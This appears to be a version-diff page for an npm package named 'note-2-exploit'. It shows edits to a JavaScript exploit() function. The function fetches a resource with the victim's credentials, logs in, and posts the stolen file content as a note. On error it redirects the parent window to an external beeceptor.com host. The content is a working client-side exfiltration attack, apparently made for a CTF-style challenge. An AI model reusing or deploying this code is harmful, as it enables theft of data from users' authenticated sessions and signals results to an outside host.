note-2-exploit 1.1.8 → 1.1.9
Sign up to get free protection for your applications and to get access to all the features.
- package/index.js +3 -4
- package/package.json +1 -1
package/index.js
CHANGED
@@ -10,9 +10,8 @@ async function exploit() {
|
|
10
10
|
"method": "GET",
|
11
11
|
"mode": "cors",
|
12
12
|
"credentials": "include"
|
13
|
-
}).then(res =>
|
14
|
-
|
15
|
-
}).catch(err => window.parent.location.replace("https://newname.free.beeceptor.com?q=fail"));
|
13
|
+
}).then(res => res.text())
|
14
|
+
.catch(err => window.parent.location.replace("https://newname.free.beeceptor.com?q=fail"));
|
16
15
|
let note_name = (Math.random() + 1).toString(36).substring(7);
|
17
16
|
await fetch("/login", {
|
18
17
|
"headers": {
|
@@ -36,7 +35,7 @@ async function exploit() {
|
|
36
35
|
"content-type": "application/json",
|
37
36
|
"sec-gpc": "1"
|
38
37
|
},
|
39
|
-
"body": "{\"title\":\"" + note_name + "\",\"content\":\"" + file_content + "\"}",
|
38
|
+
"body": "{\"title\":\"" + note_name + "\",\"content\":\"" + file_content + "end\"}",
|
40
39
|
"method": "POST",
|
41
40
|
"mode": "cors",
|
42
41
|
"redirect": "follow",
|